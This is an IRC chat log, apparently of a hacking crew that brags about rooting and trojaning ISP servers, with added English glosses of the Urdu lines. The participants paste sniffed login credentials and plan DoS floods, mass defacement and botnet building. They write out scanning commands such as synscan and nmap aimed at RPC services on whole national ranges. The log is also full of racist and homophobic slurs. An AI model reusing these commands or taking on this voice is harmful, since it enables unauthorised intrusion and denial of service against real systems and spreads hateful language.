      :D1ck! :a/s/l
      :D1ck! :a/s/l
      :D1ck! :i`m hot dude
      :D1ck! :
      :D1ck! :calcuta
      :D1ck! :INDIAN
      :D1ck! :wana chat?
      :Sp07! :?
      :D1ck! :sand nigger
      :D1ck! :heh
      :Sp07! :343/sdfdf/9sdf90d7fs
      :D1ck! :HAHAHAHHHAHA
      :D1ck! :i remember the days when i use to go to msdos and type ping ip
      :D1ck! :and 'laG' it
      :D1ck! :hahaha
      :D1ck! :72 months back
      :D1ck! :w00p
      :D1ck! :HAFEEEEEEEEEZ
      :D1ck! :zoooooooooooooom owned
      :D1ck! :HAFEEEEEEEZ
      :D1ck! :HAFEEEEEEEZ
      :D1ck! :HAFEEEEEEEZ
      :D1ck! :50,00 passwords
      :D1ck! :50,00 passwords
      :Sp07! :?
      :Sp07! :50,00?
      :Sp07! :hehe
      :D1ck! :yeah man
      :D1ck! :local isp's ns
      :D1ck! :hehe
      :D1ck! :I HATE TO OWN
      :Sp07! :heh
      :D1ck! :coz then
      :D1ck! :i have to trojan
      :D1ck! :hehhe
      :D1ck! :i have to trojan before the wake up
      :Sp07! :free internet accesss
      :Sp07! :hehe
      :Sp07! :for you and your friends
      :Sp07! :try to own earthlink.net
      :Sp07! :or pacbell
      :Sp07! :hehe
      :D1ck! :haha yep
      :D1ck! :we dont have earthlink
      :D1ck! :man
      :D1ck! :i have 0 NT skillz
      :D1ck! :teach me NT
      :Sp07! :?>
      :D1ck! :nt
      :Sp07! :I dont have nt
      :Sp07! :I dont exploit NT 
      :D1ck! :same here./
      :Sp07! :almost dinner time
      :Sp07! :I am starving man
      :D1ck! :hehe
      :D1ck! :same here.
      :Sp07! :uhhhhhhhhhhuhuhuuhu
      :Sp07! :afk
      :Sp07! :tv time
      :J4n3! :D1ck 
      :J4n3! :back from sex ;p
      :D1ck! :hahhaa
      :D1ck! :examplenet owned
      :D1ck! :main server
      :J4n3! :haahh
      :J4n3! :kewl
      :J4n3! :u got it again
      :D1ck! :no
      :D1ck! :this is new one
      :J4n3! :huh reallY ?
      :J4n3! :trojaned ?
      :D1ck! :yeah
      :D1ck! :send me root/owned
      :D1ck! :send me root/owned
      :J4n3! :wait
      :D1ck! :or some other u have
      :D1ck! :192.168.232.173 => 192.168.129.21 [110]
      :D1ck! :USER wajahatz
      :D1ck! :PASS fwjs
      :J4n3! :hahah sniffed already ?
      :D1ck! :yep
      :D1ck! :;)
      :D1ck! :i`m fast
      :D1ck! :hehe
      :J4n3! :kewl :p
      :D1ck! :what is linux.tar?
      :J4n3! :send me a file yaar
      :J4n3! :owned login trj
      :D1ck! :hehe it has one pass
      :D1ck! :the one i pasted
      :D1ck! :;/
      :J4n3! :lol
      :D1ck! :;p
      :J4n3! :ye haal hogaya hai example ka :/
      :J4n3! :it must be mail account
      :D1ck! :lol
      :J4n3! :they checked it from worldtel
      :D1ck! :yep
      :J4n3! :D1ck i have another login trj same like this but different pass
      :D1ck! :send me
      :D1ck! :HURRY
      :D1ck! :HURRY
      :D1ck! :they will wake and find out
      :D1ck! :
      :J4n3! :its on my shell
      :D1ck! :ok 
      :J4n3! :download it from there
      :D1ck! : /msg
      :D1ck! :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
      :J4n3! :Pvamu nick immi
      :J4n3! :hiall abi aayegee and she'll get killed by server :p
      
      -=-
      
      Day 04 June 7
      
      :D1ck! :<h4r33:#Linuxsex> i even have a legit box t3 | <h4r33:#Linuxsex> paying 800 per month for it |<h4r33:#Linuxsex> its a auth ns watch me in a week with my i
      :D1ck! :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
      :D1ck! :y0h
      :D1ck! :worldtel simply
      :D1ck! :sux
      :J4n3! :y0 y0
      :J4n3! :sure it does
      :D1ck! ::/
      :J4n3! ::\
      :J4n3! :4 mb bandwith :/
      :D1ck! :i`m usn\ing my bro's webnet
      :D1ck! ::)
      :D1ck! :it rox
      :J4n3! :it only works fine after 3 am to 10 am 
      :D1ck! : mb my ass
      :D1ck! : mb my ass
      :D1ck! :4 mb my ass
      :D1ck! :HAHAHAHAHA
      :J4n3! :hmmmmm :/
      :D1ck! :lol
      :D1ck! :<J4n3> it only works fine after 3 am to 10 am
      :J4n3! :satnet laaak darjay acha hai yaar is say 
      
      "satnet is 100000 times better than this"
      
      :D1ck! :any isp does
      :D1ck! :rofl
      :D1ck! :satnet rox
      :J4n3! :satnet only goes down from 10 pm to 1 am 
      :J4n3! :other time it rox
      :D1ck! :true
      :J4n3! :l0st example ?
      :D1ck! :yep
      :J4n3! ::(
      :J4n3! :whois blue0 ?
      :D1ck! blue0 :Bitch-X BaBy
      :D1ck! :dunno
      :J4n3! :hmm
      :J4n3! :yaar ye bot be sub gayeb hain
      
      "dude these bots have all disappeared"
      
      :D1ck! :ehehe
      :J4n3! :j0e manhoos ka server he down hai :/
      
      "j0e, wretch's server is down"
      
      :D1ck! :oh
      :D1ck! :lol
      :D1ck! :how come?
      :J4n3! :hehe those bot rox
      :J4n3! :donno server resolve nahin horhaa
      :J4n3! :aur us say contact be nahin horaha
      
      "and it is not possible to contact him"
      
      :J4n3! :thakay poochon
      
      "ok ask"
      
      :J4n3! :wait lemme call
      :D1ck! :oh
      :D1ck! :may be he's caught?
      :D1ck! :<D1ck> may be he's caught?
      :J4n3! :hmmm
      :J4n3! :nope
      :J4n3! :wo bauth harami banda hia
      
      "he's a total bastard"
      
      :J4n3! :ithnee aasaani say nahi pakra jayega
      
      "he wont be caught so easily"
      
      :J4n3! :haha u know what ?
      :D1ck! :?
      :J4n3! :he once asked miller to add him in k1dd13
      :D1ck! :lol
      :J4n3! :coz he's very close to miller
      :J4n3! :miller said ok
      :J4n3! :hehe
      :D1ck! :hahaha
      :D1ck! :oh then?
      :J4n3! :hah then donno he didn't come here
      :J4n3! : h1ghn3ss [~haris@hi-tech.example.net] has joined #karachi
      
      karachi is a city in pakistan - FYI
      
      :D1ck! :oye
      :D1ck! :[fuksnpr(~blue@adsl-example.net)] you worthless fucking script
      :D1ck! :          kiddie pieces of shit
      :D1ck! :dos him
      :D1ck! :dos the fuck
      :D1ck! :dos the fuck out of adsl-example.net
      :J4n3! :heh
      :J4n3! :wait
      :D1ck! :ok
      :D1ck! :J4n3 
      :D1ck! :tell me more
      :D1ck! :oye
      :D1ck! :lets do a mass defacement operation
      :J4n3! :D1ck
      :D1ck! :J4n3 
      :J4n3! :fuck light's chali gayeen theen :(
      
      "fuck, there was a power cut, lights were off"
      
      :D1ck! :ehhee ok
      :J4n3! :D1ck world tel abi tight chal raha hai :PpPPp
      
      "world tel is still running tight"
      
      :D1ck! :hehe i`m on webnet
      :J4n3! :Nahin yaar abee tight chal raha hai
      
      "no dude, it is still running tight"
      
      :J4n3! :forun telnet fast working
      
      "immediate telnet, fast working"
      
      :J4n3! :no lag :p
      :J4n3! :yaar dos1ng is easy from windows
      
      yaar = dude
      
      :D1ck! :ofcourse
      :J4n3! :linux main banda confuse hojatha hai
      
      "In linux, a person gets confused"
      
      :D1ck! :yep
      :D1ck! :;)
      :J4n3! :lemm own sum 1nd1an b0x3s and bring more bots :p
      :D1ck! :oye
      :D1ck! :scan indian servers for bind
      :D1ck! :8.2
      :D1ck! :and
      :D1ck! :8.2.1
      :J4n3! :am on windows right now 
      :J4n3! :i'll do it later and make a log of it
      :D1ck! :0h
      :D1ck! :okie
      :D1ck! :kewl
      :J4n3! :or wait lemme see if j0e's server is up
      :J4n3! :i'll do it from there
      :D1ck! :oki
      :D1ck! :aHAhahaha
      :D1ck! :<vanilla> oh ho 
      :D1ck! :<vanilla> aaj tum vanila nahin anilaa lag rahi ho
      :D1ck! :<vanilaa> undar say kurwi upar ssay chamkili
      :D1ck! :HAHAHAHAHAH
      :D1ck! :start par addd
      :D1ck! :
      :D1ck! :lol
      :J4n3! :hehe
      :D1ck! :hehee
      :J4n3! :ravi       console      Jun  7 20:30    (:0)
      :J4n3! :ravi       pts/4        Jun  7 20:31
      :J4n3! :ravi       pts/5        Jun  7 20:31
      :J4n3! :ravi       pts/3        Jun  7 20:31    (    )
      :J4n3! :ravi       pts/6        Jun  7 20:31
      :J4n3! :ravi       pts/7        Jun  7 20:31    (:0.0)
      :J4n3! :ravi       pts/8        Jun  7 20:31    (:0.0)
      :J4n3! :active hmm
      :D1ck! :hahahah
      :D1ck! :scan
      :D1ck! :scan
      :D1ck! :scan
      :D1ck! ::)
      :D1ck! :india***
      :D1ck! ::P
      :J4n3! :hehe
      :J4n3! :*******************************************************************************
      :J4n3! :                           A T T E N T I O N
      :J4n3! :*******************************************************************************
      :J4n3! :               YOU  ARE  REQUESTED TO RESHELVE THE BOOKS AFTER USE
      :J4n3! :           SO THAT WE CAN MAINTAIN A CLEAN AND TIDY WORKING ENVIRONMENT
      :J4n3! :                     THANKING YOU FOR YOUR KIND CO-OPERATION
      :J4n3! :****************************************************
      :J4n3! :ok sir :)
      :D1ck! :hahahaa
      :D1ck! :thanks:)
      :D1ck! :hehe
      :D1ck! :i`m so sleeeeeeeeepy
      :D1ck! :oye if i sleep i`ll be back till 3-4
      :D1ck! :or 4-5-
      :D1ck! ::P
      :D1ck! :oye
      :D1ck! :windows?
      :D1ck! :get that webpage done :P
      :J4n3! :yeah
      :J4n3! :yeah  Inshallah tonight
      :J4n3! ::)
      :J4n3! :oye wordtel daur raha hai hahaha very fast :p
      
      "yo world tel is running quite fast"
      
      :J4n3! :patha nahi kaisay chamatkaar hogaya :/
      
      "dont know how the miracle occured"
      
      :J4n3! :Mashallah Mashallah
      
      "good lord, good lord"
      
      :J4n3! :kahin nazar na lag jaye kameenay ko
      
      "just hope the bastard doesnt get an evil eye"
      
      :J4n3! :D1ck 
      :J4n3! :heh khamoshi of #pakistan dossed :p
      :D1ck! :?
      :D1ck! :why?
      :J4n3! :kisi aur ko karna hai ?
      
      "do you want to do anyone else?"
      
      :D1ck! :nope
      :J4n3! :coz i had a panga with its owner
      
      "because i had a quarrel with its owner"
      
      :J4n3! :tkx
      :D1ck! :dosing with out any reason 
      :D1ck! :hehee
      :J4n3! :i dont go to channel pakistan anymore
      :D1ck! :oh
      :J4n3! :though i have access there still
      :J4n3! :yaar ek baath samaj nahi aatha
      
      "dude, i cant understand one thing"
      
      :D1ck! :THATS A GOOD REASON
      :D1ck! :THATS A GOOD REASON
      :D1ck! :THATS A GOOD REASON
      :D1ck! ::P
      :D1ck! :oye
      :D1ck! :scan kya
      
      "did you scan?"
      
      :D1ck! :?
      :D1ck! :cool
      :D1ck! :????
      :D1ck! :???????????????
      :D1ck! :????????????????????????
      :J4n3! :when u do smurf attack, then ppl come back soon , i mean jaldee up hojathay hain
      
      jaldee = quickly
      
      :D1ck! :???????????????????????????????
      :J4n3! :lekin syn attack main tho gayeb hee hojathay hain
      
      "but they disappear in a syn attack"
      
      :D1ck! :??????????????????????????????????????
      :D1ck! :smurf sucks
      :J4n3! :khamoshi ek gantay say down hai phir up nahin huwa
      
      "khamoshi (the word means silence, but used here as a server name, i guess) is down since one hour, and not yet come up"
      
      :J4n3! :jub wo ping time out huwa  tha thub mainay attack chor diya i mean rok liya
      
      "when the ping timed out, i stopped the (ongoing) attack"
      
      :D1ck! :smurf is only good if u have a VIRGIN and tyte ip file, with duals routers in it
      :J4n3! :lekin phir bee up nahin huwa abee thak
      
      "but still it is not up till now"
      
      :J4n3! :yeahhh
      :J4n3! :syn rox
      :D1ck! :hehe
      :J4n3! :i did ./z0ne -clo in > in &
      
      .in is the TLD for indian sites
      
      :J4n3! :heh i do it with 8 boxes , satyanaas hojatha hai 
      
      "i do it with 8 boxes, creates sheer destruction"
      
      :D1ck! :how do u scan syn with iplist?
      :D1ck! :./synscan INDIA.log
      :D1ck! :u can do that?????
      :D1ck! :lol
      :D1ck! :;)
      :D1ck! :i do it with 35 boxes
      :D1ck! :(i`m talking about when i had roots)
      :D1ck! :now i have 4 roots
      :D1ck! ::(
      :D1ck! :or soem thing
      :D1ck! ::
      :D1ck! ::)
      :D1ck! :coz i`m now towards coding.
      :D1ck! ::P
      :D1ck! :for a while
      :D1ck! :heh
      :J4n3! :huh
      :J4n3! :good
      :J4n3! :naa i'm donig z0ne on india
      :J4n3! :then will do ./synscan in.log in eth0 100 53
      :D1ck! :kewl
      :J4n3! ::)
      :D1ck! :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
      :D1ck! : jeje
      :D1ck! :oh
      :D1ck! :god
      :D1ck! :look who is here
      :m4ry! :yo
      :m4ry! :faw
      :m4ry! :code 33
      :D1ck! :lahore
      :D1ck! :?
      :D1ck! :m4ry
      :D1ck! :m4ry
      :D1ck! :ah
      :D1ck! :hehehe
      :m4ry! :lahore owns yew
      :m4ry! :WOL
      :D1ck! :hehehe
      :D1ck! :man
      :m4ry! :scan it for me
      :m4ry! :my cuz is outta hours
      :m4ry! :the admin to my NS finally logged in
      :D1ck! :this is the first time i`ve seen u on IRC at  1 am
      :D1ck! :this is the first time i`ve seen u on IRC at  1 am
      :m4ry! :haha
      :D1ck! :hahaha
      :m4ry! :my cuz has O'levels
      :m4ry! :and he's online rightn ow
      :m4ry! :so Sup
      :D1ck! :LOL
      :D1ck! :not much
      :D1ck! :bored
      :D1ck! :oh
      :D1ck! :owned example net's NS
      :D1ck! :but lost it that very second
      :D1ck! ::/
      :m4ry! :oh
      :m4ry! :btw
      :m4ry! :btw
      :D1ck! :6 am
      :m4ry! :add a examplenet acct for me
      :D1ck! :they were in
      :m4ry! :i can use ithere
      :D1ck! :
      :D1ck! :i dont have example, any more
      :m4ry! :ithere = it here
      :D1ck! ::/
      :m4ry! :also, contact Rdog, tell him to add a account on the Gilgit Comsats server
      :m4ry! :i can use that here as well
      :D1ck! :i juped diz
      :D1ck! :and #delusion almosr got purged
      :m4ry! :i lost 2 more linux ooxes :/
      :m4ry! :LOL
      :m4ry! :aww
      :m4ry! :RR..?
      :D1ck! :hehe
      :D1ck! :Rdog?
      :m4ry! :get it purged man
      :D1ck! :he wants ISP's
      :m4ry! :DoS rapt0r/pr0be
      :D1ck! :frtom me
      :D1ck! ::p
      :D1ck! :i will :)
      :D1ck! :hehe
      :m4ry! :lol
      :D1ck! :yep
      :m4ry! :add the damn accounts
      :m4ry! :and let me know
      :D1ck! :i ookover 4 diz's boxes
      :m4ry! :and btw, the example admin is a chick
      :D1ck! :oki
      :m4ry! :aain? :P~
      :m4ry! :again? :P~
      :D1ck! ::P~
      :D1ck! :gegege
      :D1ck! :yep
      :D1ck! :<m4ry> again? :P~
      :D1ck! :yep
      :D1ck! :owned 4 .uk
      :D1ck! :'s
      :m4ry! :keep Diz's boxen
      :D1ck! :he is lame
      :m4ry! :i'll gety started on the SunOS version of TFN
      :D1ck! :his pass was 'fuck111'
      :D1ck! :hehe
      :D1ck! :ok
      :D1ck! :good.
      :m4ry! :we'll have the bifiggerst FN in the world
      :m4ry! :since ADM
      :m4ry! :lol
      :D1ck! :yep
      :m4ry! :he's lame
      :D1ck! :jane got 20000+
      :m4ry! :his pass was 'jusjesus' last time
      :D1ck! :hehe
      :m4ry! :(that's what faisal told me)
      :m4ry! :and u told me
      :D1ck! :jane + m4ry + rave + dick
      :D1ck! :oh god
      :D1ck! :bandwith
      :D1ck! :hahahaha
      :D1ck! :nope
      :m4ry! : = Major FN
      :m4ry! :shit
      :m4ry! :i hate this 
      :m4ry! :keyboard
      :J4n3! :save2 add J4n3 * J4n3 100 1 4
      :J4n3! :save2 add d1ck * d1ck 100 1 4
      :D1ck! :are u in BX?
      :m4ry! :J4n3 
      :m4ry! :sup
      :m4ry! :d00d
      :m4ry! :man i'm hungry
      :J4n3! :save2 add m4ry * m4ry 100 1 4
      :J4n3! :m4ry :p
      :D1ck! :hahaha
      :m4ry! :yeah
      :m4ry! :BX
      :m4ry! :from24.* box
      :m4ry! :pretty fast
      :D1ck! :order a pizza
      :J4n3! :save2 save
      :m4ry! :T1 i think
      :D1ck! :hehe
      :J4n3! :save2 nick Canopus
      :D1ck! :yep
      :m4ry! :0-usage
      :m4ry! :the admin logs in wvery once in a while to run his sweet oracle
      :D1ck! :m4ry: when u coming back to khi?
      :m4ry! :prolly a week or so
      :m4ry! :u checked out the new kernel (2.2.15)?
      :D1ck! :<Doggy^:#Linuxsex> lol
      :D1ck! :<BiGm|kE:#Linuxsex> ratios suck ass that's why
      :D1ck! :<Doggy^:#Linuxsex> try #cracks here on undernet
      :m4ry! :well
      :D1ck! :FUCK DOGGY
      :m4ry! :new isn't exactly true
      :D1ck! :SUCKING UOP LINUXSEX'S BALLS
      :D1ck! :$#%#@
      :m4ry! :LOL
      :m4ry! :DoS him
      :m4ry! :kick/ban him
      :D1ck! :m4ry: nope, is it stable?
      :D1ck! :the kernel
      :D1ck! :hahaha
      :m4ry! :DAMN L33T KERNEL
      :m4ry! :get it
      :m4ry! :16 megs worth the download
      :D1ck! :kewl
      :J4n3! :save2 .add D1ck * D1ck 100 1 4
      :D1ck! :ok i will
      :m4ry! :i was wondering
      :m4ry! :do you want to merge K1dd13 and tr1be?
      :m4ry! :all local guys
      :m4ry! :u can deal with the stupid people
      :m4ry! :kick them out
      :m4ry! :talk with faisal
      :m4ry! :paw
      :D1ck! :no merge
      :m4ry! :./clear :P~
      :D1ck! ::P
      :m4ry! :ok
      :m4ry! :no merge
      :D1ck! :parents?
      :m4ry! :undetstood
      :m4ry! :understood
      :m4ry! :yeah
      :m4ry! :aunties
      :D1ck! :cool
      :m4ry! :get a husmail account
      :m4ry! :www.hushmail.com
      :m4ry! :damn l33t
      :D1ck! :ah
      :D1ck! :hahaa
      :D1ck! :ARW
      :D1ck! :lol
      :D1ck! :okies
      :m4ry! :encrypted email from user-to-user (of husmail only)
      :D1ck! :hetaaz: i`m geting k1dd13-online.org
      :D1ck! :m4ry
      :m4ry! :haha
      :D1ck! :check this
      :m4ry! :l33t
      :m4ry! :yeah..?
      :D1ck! :www9.example.com/k1dd13
      :D1ck! :and
      :D1ck! :www9.example.com/k1dd13/Article3.html
      :D1ck! :and
      :D1ck! :0-day section coming up
      :D1ck! :password protected 
      :D1ck! :just for u me jane rave and bob
      :D1ck! :in smaller versionm just for #k1dd13
      :D1ck! :hehe
      :D1ck! ::)
      :m4ry! :l33t
      :D1ck! ::)
      :m4ry! :MAN
      :m4ry! :get PGP
      :m4ry! :mail me ur PGP key
      :m4ry! :ripgut@example.net
      :D1ck! :ok
      :m4ry! :pgp owns you
      :D1ck! :CERT.ORG?
      :m4ry! ::)
      :D1ck! :hehhe
      :m4ry! :what about cert?
      :D1ck! :ok i`ll get it?
      :D1ck! :ok i`ll get it
      :m4ry! ::)
      :m4ry! :yeah
      :m4ry! :do that
      :D1ck! :btw
      :D1ck! :www.example.com owned by rootworm
      :D1ck! :JP SUX
      :D1ck! :$@
      :m4ry! :NO WAY
      :D1ck! :JP = qu33r
      :D1ck! :heh
      :m4ry! :COOL
      :D1ck! :yep
      :m4ry! :JP is gay
      :m4ry! :known fact
      :m4ry! :he fucked his dad
      :D1ck! :yep
      :D1ck! :fucked his dad?
      :D1ck! :how/why/what/when
      :D1ck! :?
      :m4ry! :shit
      :m4ry! :i'm out
      :m4ry! :aunty needs fone
      :m4ry! :only 1 fone :/
      :D1ck! :<Doggy^:#Linuxsex> wow
      :D1ck! :HAHAHAHAHAHA
      :D1ck! :Time 10:55 m4ry on chat, mom at back 
      :D1ck! :HAHAAHAHAHAHHAHAHAH
      :J4n3! :LOOOOOOOOL
      :J4n3! :what a h4x0r
      :D1ck! ::p
      :D1ck! :keke
      :D1ck! :d4v3
      :D1ck! :done with password.html
      :D1ck! :?
      :D1ck! :i`m getting LEET 0-day section
      :D1ck! ::)
      :J4n3! :kewl wait 30 mins plz
      :J4n3! :kuch panga horaha hai set kartha hon
      
      "some nonsense is going on, i am trying to set it"
      
      :D1ck! :oki
      :J4n3! :lekin masla doosra h ia
      
      "but the reason is something else"
      
      :J4n3! :mujay yaad hee nahi raha
      
      "I havent been able to remember"
      
      :J4n3! :abee tho meray system par sahi chal jayega lekin
      
      "For now, it will run from my system"
      
      :J4n3! :i think example.com doesn't give u authority to run cgi
      :D1ck! :oh
      :J4n3! :we have to put a java encryption
      :D1ck! :oh
      :D1ck! :oki
      :D1ck! ::(
      :J4n3! :don worry i'll put a tight java wait
      :D1ck! :oki
      :J4n3! :i'm on java archieve page,  lemme select one
      :D1ck! :oki
      :D1ck! :J4n3
      :D1ck! :how manys
      :D1ck! :boxes intotal u have?
      :J4n3! :40 sparc
      :J4n3! :and donno about linux
      :D1ck! :wow 
      :D1ck! :cool
      :J4n3! :i rmoved x86's from my list
      :J4n3! :coz dont have rootkit
      :D1ck! :shit
      :J4n3! :but till tomorrow i'll have 70 sparc's
      :D1ck! :u should have given them to meh
      :D1ck! ::P
      :D1ck! :coooool
      :J4n3! :hmmm :(
      :D1ck! :./synscan 61 61.log eth0 100 111 &
      :J4n3! :don worry i'll give them to u now on
      :D1ck! :w00p
      :J4n3! :hehe
      :D1ck! :hehehe oki
      :J4n3! :oye
      :J4n3! :u know what
      :D1ck! :yeah?
      :D1ck! :what?
      :D1ck! :????
      :J4n3! :i did that synscan from j0e's box
      :D1ck! :yep and?
      :J4n3! :and he got emails from all edu's and too many severs
      :J4n3! :shit he's wondering who did it
      
      it seems they are using their buddies' boxes to do syn scans
      
      :D1ck! :HAHAHAHAHA
      :J4n3! :lol
      :D1ck! :kik'
      :D1ck! :lol
      :J4n3! :i removed all directorys from there
      :J4n3! :hehehe
      :D1ck! :worldtel would be flooded with mailks
      :D1ck! :user 'shahvez'
      :D1ck! :user' d4v3'
      :D1ck! :hahahahaha
      :D1ck! :okki
      :D1ck! :give me access to his server
      :D1ck! :i ferg0t the pass
      :J4n3! ::/
      :D1ck! :
      :D1ck! ::(
      :J4n3! :he changed the root pass
      :J4n3! :and closed all logins 
      :D1ck! :not the root
      :D1ck! :local
      :D1ck! :desire?
      :D1ck! :closed?
      :J4n3! :yeah desire is also not working
      :D1ck! :wtf?
      :D1ck! :thats gay
      :J4n3! :he said he'll open it tomorrow
      :J4n3! :not the others but mine
      :D1ck! :why is he acting like he pays for the server?
      :J4n3! :no yaar he's jigar  ,he's just worried
      :D1ck! :hmmmmm
      :J4n3! :actually he called me, tonight
      :D1ck! :kk
      :J4n3! :and dont have electricity , he said as soon as i get it on i'll open ur account
      :J4n3! :no actually he bought that server legally
      :J4n3! ::)
      :D1ck! :<J4n3> no actually he bought that server legally
      :D1ck! :WHAT?
      :D1ck! :u told me
      :D1ck! :that
      :D1ck! :he carded it@
      :D1ck! :??????
      :J4n3! :yup he did
      :J4n3! :but now he sent payment when he got email that the CC denied to pay
      :D1ck! :oh
      :D1ck! :LOL
      :D1ck! :ok
      :J4n3! :hehe he's in business mood 
      :J4n3! :to run shell and bnc's
      :D1ck! :oh
      :D1ck! :he's a nice guy?
      :J4n3! :yeah he is
      :J4n3! :he is jigar yaar
      :D1ck! :cool
      :J4n3! :D1ck u on windows ?
      :D1ck! :nope
      :D1ck! :lInUX:(
      :D1ck! :i`m thinking of coding some thing
      :D1ck! :gonna write code for gethostname()
      :D1ck! :so i can use scan 
      :J4n3! :: Multiple User Name and Password  
      :J4n3! :Set up multiple username and passwords for members: 
      :J4n3! :Add the code to your "enter" page, if they get it wrong, they stay, if they get it right, they can go it. You can set up multiple username and password in the script, like a member list.
      :D1ck! :and mass ath0
      :J4n3! :hmmm kewl :)
      :D1ck! :kewl
      :D1ck! :
      :D1ck! ::)))))
      :J4n3! ::))
      :J4n3! :there r some others lemme check them 
      :D1ck! :m4ry
      :m4ry! :D1ck
      :m4ry! :PAW
      :m4ry! :FAW
      :m4ry! :the works
      :D1ck! :hehe ok
      :D1ck! :;)
      :m4ry! :everything AW
      :D1ck! :Hi FREIND
      :D1ck! :HI AUNTI
      :m4ry! :i need symetrix's number
      :m4ry! :LOL
      :m4ry! :SHUTUP
      :D1ck! :hahahahaha
      :m4ry! :go ask someone in #LinuxSEx for their phphone number
      :m4ry! :i need to call someone int he US
      :m4ry! :check if dialpad works
      :m4ry! ::/
      :m4ry! :i called CERT
      :D1ck! :lemme ask sym?
      :D1ck! :hahahahaha
      :D1ck! :what did they say?
      :m4ry! :some faggot picked up and he sounded q ueer so i closed it
      :D1ck! :HAHAHAHAHAHA
      :m4ry! :seriously.. no joke
      :m4ry! :i think he was JP or someone
      :m4ry! :go ask sym
      :D1ck! :lame diz is online
      :m4ry! :or MadCamel
      :D1ck! :hahaha
      :m4ry! :or anyone
      :m4ry! :lol
      :D1ck! :hehehe
      :m4ry! :Dos him
      :D1ck! :no one's on
      :m4ry! :shiat
      :D1ck! :and i aint speaking in #linuxsex
      :D1ck! :OR
      :D1ck! :sysop
      :D1ck! :will eat my heaf
      :D1ck! ::(
      :D1ck! :head
      :m4ry! :LOL
      :m4ry! :LOL
      :m4ry! :Sysop ..
      :m4ry! :sigh
      :m4ry! :talk to him
      :D1ck! :hahaha
      :m4ry! :tell him ur really sorry etc..
      :m4ry! :SN1P3R
      :D1ck! :he lives in romania
      :m4ry! :GO TO THE US RIGHT NOW AND GIVE ME UR PHONE NUMBER
      :D1ck! :???
      :m4ry! ::-x
      :m4ry! :(gasp)
      :D1ck! :HAHAHAHA
      :D1ck! :are u feeling ok?
      :D1ck! :wtf is gasp
      :m4ry! :man
      :m4ry! :these guys are eating my head
      :m4ry! :i had to fix their modem, sound card, speakers, mic
      :D1ck! :nam
      :D1ck! :who?
      :m4ry! :nwo they want me to get dialpad woo work
      :D1ck! :HAHAHAHAHAHAHAHAHAHAHAHAHAHA
      :m4ry! :mamo's
      :m4ry! :house
      :D1ck! :LOL
      :D1ck! :ROFL
      :D1ck! :oh
      :D1ck! :
      :D1ck! :ROFL
      :D1ck! :elite HACKER m4ry;)
      :D1ck! :HEATAZ
      :m4ry! :DEATHaCeS ?
      :m4ry! :jupe?
      :D1ck! : CAN U FEEL TH BLINK
      :D1ck! :?
      :D1ck! :yeah
      :m4ry! :hacker my foot
      :D1ck! :jupe
      :m4ry! :nah
      :m4ry! :non-ansi terminal
      :D1ck! :hahahah
      :m4ry! :vt100 owns yew
      :D1ck! :oh
      :D1ck! ::/
      :m4ry! :it sux
      :D1ck! :TERM=elitehackers
      :m4ry! :black & white
      :D1ck! :telnet 127.0.0.1
      :D1ck! :bash#
      :D1ck! :lol
      :D1ck! :get mIRC
      :D1ck! :#$@#$@#$
      :m4ry! :i have it
      :m4ry! :i hate it
      :m4ry! :but it's really fucked up
      :D1ck! :oh
      :D1ck! :use it 
      :m4ry! :DALnet 
      :D1ck! :hahaha
      :m4ry! :all lahories go to DALnet
      :m4ry! :buncha faggots
      :D1ck! :heh
      :D1ck! :LOL
      :D1ck! :faggots
      :D1ck! :#ph33r-the-b33r == dalnet
      :m4ry! :Lahore = GAY land
      :D1ck! :#ph33r-the-b33r == dalnet
      :D1ck! :BWHAHAHA
      :D1ck! :LAHORE = ultra gay
      :m4ry! :i met  rave- on Darknet
      :D1ck! :yep
      :m4ry! :EFnet
      :m4ry! ::)
      :D1ck! :Interesting ports on ns3.example.net.xx (192.168170.1.99):
      :D1ck! :Port    State       Protocol  Service (RPC)
      :D1ck! :32892   open        tcp       (rusersd V2-3)
      :D1ck! :we were hanging in #k1dd13 for a while
      :D1ck! :on efnet
      :D1ck! ::P
      :m4ry! :scan UDP (same port range) to find sadmind
      :m4ry! :get example mail server
      :m4ry! :and man
      :m4ry! :PLEASE
      :m4ry! :scan this WOL shit
      :D1ck! :nmap -PS80 -sR -sS $1 -p 32000-33000
      :D1ck! :$1=argv[1]
      :D1ck! :hahaa
      :m4ry! :com192.168
      :m4ry! :192.168
      :m4ry! :.*.*
      :m4ry! :;)
      :D1ck! :well
      :D1ck! :<h4r33:#Linuxsex> HEHE
      :D1ck! :LAME MOFO
      :D1ck! :
      :D1ck! :<_cen:#Linuxsex> :)
      :m4ry! :or just add a example zccount
      :D1ck! :cen == tc
      :m4ry! :the WOL guys are stupid
      :D1ck! :MAN i lost example
      :D1ck! :
      :m4ry! : ircname  : boo hoo griddypoo
      :m4ry! :| channels : +#LINUXSEX               
      :m4ry! :LOL
      :m4ry! :(_cen)
      :D1ck! :gegege
      :m4ry! :haww
      :m4ry! :u lost example?
      :m4ry! :how?
      :m4ry! :why
      :m4ry! :when
      :m4ry! :where
      :D1ck! :g
      :D1ck! :hehe
      :m4ry! :WHY
      :m4ry! :WHYYYYY
      :m4ry! :i need 3r33t-hax0r hours
      :D1ck! :coz
      :D1ck! :rlogin was fucked
      :D1ck! :i dint have a login.trj
      :m4ry! :use vortex
      :m4ry! :<G>
      :D1ck! :HAHAHAHAHAHHA
      :D1ck! :k
      :m4ry! :ok
      :m4ry! :now i gotta sleep
      :m4ry! :my cuz has exams tommorow
      :D1ck! :i never tried vortex
      :D1ck! :LOL
      :m4ry! :and we all sleep in the same room *yuck*
      :D1ck! :ok
      :D1ck! :cya
      :D1ck! :hahaha
      :m4ry! :vortex owns ou.. i got back firewalled hosts from that
      :D1ck! :*LOL*
      :m4ry! :all ports firewalled (TPCP) except for port 1-1024
      :D1ck! :kewl
      :D1ck! :hahhaa
      :m4ry! :ok
      :m4ry! :i'm out
      :D1ck! :k
      :D1ck! :go
      :D1ck! :run
      :D1ck! :bye
      :D1ck! :
      :m4ry! :i would detach BX, but this SunOS version really fucks up and doesn't re-sttae-attack
      :m4ry! :attatch
      :m4ry! :attach
      :D1ck! :hahhaa
      :D1ck! :do it
      :D1ck! : /detach
      :D1ck! : /detach
      :D1ck! : /detach
      :m4ry! :sigh
      :m4ry! :ok
      :m4ry! :or nevermind
      :D1ck! : /away detached
      :m4ry! :i need to add a user
      :m4ry! :viper
      :m4ry! :to get better ident :)
      :D1ck! :hehe
      :m4ry! :bye
      :D1ck! :ok
